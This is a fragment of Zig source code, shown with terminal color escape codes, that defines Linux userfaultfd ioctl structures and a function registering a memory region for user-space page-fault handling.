�[1m�[37m �[0m�[1m�[37mMINOR_HUGETLBFS�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mbool�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mfalse�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mMINOR_SHMEM�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mbool�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mfalse�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m_�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37mu53�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mapi�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu64�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mfeatures�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37mFEATURE�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mioctls�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu64�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37muffdio_range�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mextern�[0m�[1m�[37m �[0m�[33mstruct�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mstart�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu64�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mlen�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu64�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37muffdio_register�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mextern�[0m�[1m�[37m �[0m�[33mstruct�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mpub�[0m�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mMODE�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mpacked�[0m�[1m�[37m �[0m�[33mstruct�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[36mu64�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mMISSING�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mbool�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mfalse�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mWP�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mbool�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mfalse�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mMODE_MINOR�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mbool�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mfalse�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m_�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37mu61�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mrange�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37muffdio_range�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mmode�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37mMODE�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mioctls�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu64�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37muffdio_copy�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mextern�[0m�[1m�[37m �[0m�[33mstruct�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mpub�[0m�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mMODE�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mpacked�[0m�[1m�[37m �[0m�[33mstruct�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[36mu64�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mDONTWAKE�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mbool�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mfalse�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mWP�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mbool�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mfalse�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m_�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37mu62�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mdst�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu64�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37msrc�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu64�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mlen�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu64�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mmode�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37mMODE�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mcopy�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mi64�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37muffdio_zeropage�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mextern�[0m�[1m�[37m �[0m�[33mstruct�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mpub�[0m�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mMODE�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mpacked�[0m�[1m�[37m �[0m�[33mstruct�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[36mu64�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mDONTWAKE�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mbool�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mfalse�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m_�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37mu63�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mrange�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37muffdio_range�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mmode�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37mMODE�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mzeropage�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mi64�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37muffdio_writeprotect�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mextern�[0m�[1m�[37m �[0m�[33mstruct�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mpub�[0m�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mMODE�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mpacked�[0m�[1m�[37m �[0m�[33mstruct�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[36mu64�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mWP�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mbool�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mfalse�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mDONTWAKE�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mbool�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mfalse�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m_�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37mu62�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mrange�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37muffdio_range�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mmode�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37mMODE�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37muffdio_continue�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mextern�[0m�[1m�[37m �[0m�[33mstruct�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mpub�[0m�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mMODE�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33mpacked�[0m�[1m�[37m �[0m�[33mstruct�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[36mu64�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mDONTWAKE�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mbool�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mfalse�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m_�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37mu63�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mrange�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37muffdio_range�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mmode�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37mMODE�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mmapped�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mi64�[0m�[1m�[37m,�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mUFFD_API�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[36mu64�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0xaa�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mUFFDIO�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[33menum�[0m�[1m�[37m(�[0m�[1m�[36mu32�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37m_uffdio�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36m0xaa�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mioctl�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mlinux�[0m�[1m�[37m.�[0m�[1m�[37mIOCTL�[0m�[1m�[37m;�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mAPI�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mioctl�[0m�[1m�[37m.�[0m�[37mIOWR�[0m�[1m�[37m(�[0m�[1m�[37m_uffdio�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0x3f�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37muffdio_api�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mREGISTER�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mioctl�[0m�[1m�[37m.�[0m�[37mIOWR�[0m�[1m�[37m(�[0m�[1m�[37m_uffdio�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0x00�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37muffdio_register�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mUNREGISTER�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mioctl�[0m�[1m�[37m.�[0m�[37mIOR�[0m�[1m�[37m(�[0m�[1m�[37m_uffdio�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0x01�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37muffdio_range�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mWAKE�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mioctl�[0m�[1m�[37m.�[0m�[37mIOR�[0m�[1m�[37m(�[0m�[1m�[37m_uffdio�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0x02�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37muffdio_range�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mCOPY�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mioctl�[0m�[1m�[37m.�[0m�[37mIOWR�[0m�[1m�[37m(�[0m�[1m�[37m_uffdio�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0x03�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37muffdio_copy�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mZEROPAGE�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mioctl�[0m�[1m�[37m.�[0m�[37mIOWR�[0m�[1m�[37m(�[0m�[1m�[37m_uffdio�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0x04�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37muffdio_zeropage�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mWRITEPROTECT�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mioctl�[0m�[1m�[37m.�[0m�[37mIOWR�[0m�[1m�[37m(�[0m�[1m�[37m_uffdio�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0x06�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37muffdio_writeprotect�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37mCONTINUE�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mioctl�[0m�[1m�[37m.�[0m�[37mIOWR�[0m�[1m�[37m(�[0m�[1m�[37m_uffdio�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[36m0x07�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37muffdio_continue�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mpub�[0m�[1m�[37m �[0m�[33mfn�[0m�[1m�[37m �[0m�[37mregister�[0m�[1m�[37m(�[0m�[1m�[37mregion�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m[]�[0m�[1m�[36mu8�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[33mcomptime�[0m�[1m�[37m �[0m�[1m�[37mfault_handler�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37manytype�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37mfh_args�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37manytype�[0m�[1m�[37m)�[0m�[1m�[37m �[0m�[1m�[36m!�[0m�[1m�[36mvoid�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37mfd�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[1m�[37mfd_t�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mblk�[0m�[1m�[36m:�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mconst�[0m�[1m�[37m �[0m�[1m�[37merr�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mlinux�[0m�[1m�[37m.�[0m�[37msyscall1�[0m�[1m�[37m(�[0m�[1m�[37mlinux�[0m�[1m�[37m.�[0m�[1m�[37msyscalls�[0m�[1m�[37m.�[0m�[1m�[37mX64�[0m�[1m�[37m.�[0m�[1m�[37muserfaultfd�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[37m@as�[0m�[1m�[37m(�[0m�[1m�[36mu32�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[37m@bitCast�[0m�[1m�[37m(�[0m�[1m�[37mlinux�[0m�[1m�[37m.�[0m�[1m�[37mO�[0m�[1m�[37m{�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mCLOEXEC�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mtrue�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mNONBLOCK�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mtrue�[0m�[1m�[37m �[0m�[1m�[37m})));�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mswitch�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mlinux�[0m�[1m�[37m.�[0m�[1m�[37mE�[0m�[1m�[37m.�[0m�[37minit�[0m�[1m�[37m(�[0m�[1m�[37merr�[0m�[1m�[37m))�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mSUCCESS�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[33mbreak�[0m�[1m�[37m �[0m�[1m�[36m:�[0m�[1m�[37mblk�[0m�[1m�[37m �[0m�[37m@intCast�[0m�[1m�[37m(�[0m�[1m�[37merr�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33melse�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37me�[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37munexpectedErrno�[0m�[1m�[37m(�[0m�[1m�[37me�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mufapi�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37muffdio_api�[0m�[1m�[37m{�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mapi�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mUFFD_API�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mfeatures�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37m.{},�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mioctls�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mundefined�[0m�[1m�[37m �[0m�[1m�[37m};�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33mswitch�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37merrno�[0m�[1m�[37m(�[0m�[1m�[37mlinux�[0m�[1m�[37m.�[0m�[37mioctl�[0m�[1m�[37m(�[0m�[1m�[37mfd�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[37m@intFromEnum�[0m�[1m�[37m(�[0m�[1m�[37mUFFDIO�[0m�[1m�[37m.�[0m�[1m�[37mAPI�[0m�[1m�[37m),�[0m�[1m�[37m �[0m�[37m@intFromPtr�[0m�[1m�[37m(�[0m�[1m�[36m&�[0m�[1m�[37mufapi�[0m�[1m�[37m))))�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mSUCCESS�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[1m�[37m{},�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33melse�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37merr�[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37munexpectedErrno�[0m�[1m�[37m(�[0m�[1m�[37merr�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
�[1m�[37m �[0m�[33mvar�[0m�[1m�[37m �[0m�[1m�[37mufreg�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37muffdio_register�[0m�[1m�[37m{�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mrange�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mstart�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[37m@intFromPtr�[0m�[1m�[37m(�[0m�[37m@as�[0m�[1m�[37m([�[0m�[1m�[36m*�[0m�[1m�[37m]�[0m�[1m�[36mu8�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[37m@ptrCast�[0m�[1m�[37m(�[0m�[1m�[37mregion�[0m�[1m�[37m))),�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mlen�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37mregion�[0m�[1m�[37m.�[0m�[1m�[37mlen�[0m�[1m�[37m �[0m�[1m�[37m},�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mmode�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[37m.{�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mMISSING�[0m�[1m�[37m �[0m�[1m�[36m=�[0m�[1m�[37m �[0m�[1m�[36mtrue�[0m�[1m�[37m �[0m�[1m�[37m},�[0m�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mioctls�[0m�[1m�[37m �[0m�[1m�[0m...
�[1m�[37m �[0m�[33mswitch�[0m�[1m�[37m �[0m�[1m�[37m(�[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37merrno�[0m�[1m�[37m(�[0m�[1m�[37mlinux�[0m�[1m�[37m.�[0m�[37mioctl�[0m�[1m�[37m(�[0m�[1m�[37mfd�[0m�[1m�[37m,�[0m�[1m�[37m �[0m�[37m@intFromEnum�[0m�[1m�[37m(�[0m�[1m�[37mUFFDIO�[0m�[1m�[37m.�[0m�[1m�[37mREGISTER�[0m�[1m�[37m),�[0m�[1m�[37m �[0m�[37m@intFromPtr�[0m�[1m�[37m(�[0m�[1m�[36m&�[0m�[1m�[37mufreg�[0m�[1m�[37m))))�[0m�[1m�[37m �[0m�[1m�[37m{�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m.�[0m�[1m�[37mSUCCESS�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[1m�[37m{},�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[33melse�[0m�[1m�[37m �[0m�[1m�[36m=>�[0m�[1m�[37m �[0m�[1m�[36m|�[0m�[1m�[37merr�[0m�[1m�[36m|�[0m�[1m�[37m �[0m�[33mreturn�[0m�[1m�[37m �[0m�[1m�[37mposix�[0m�[1m�[37m.�[0m�[37munexpectedErrno�[0m�[1m�[37m(�[0m�[1m�[37merr�[0m�[1m�[37m),�[0m�[1m�[37m�[0m
�[1m�[37m �[0m�[1m�[37m}�[0m�[1m�[37m�[0m
�[1m�[37m�[0m
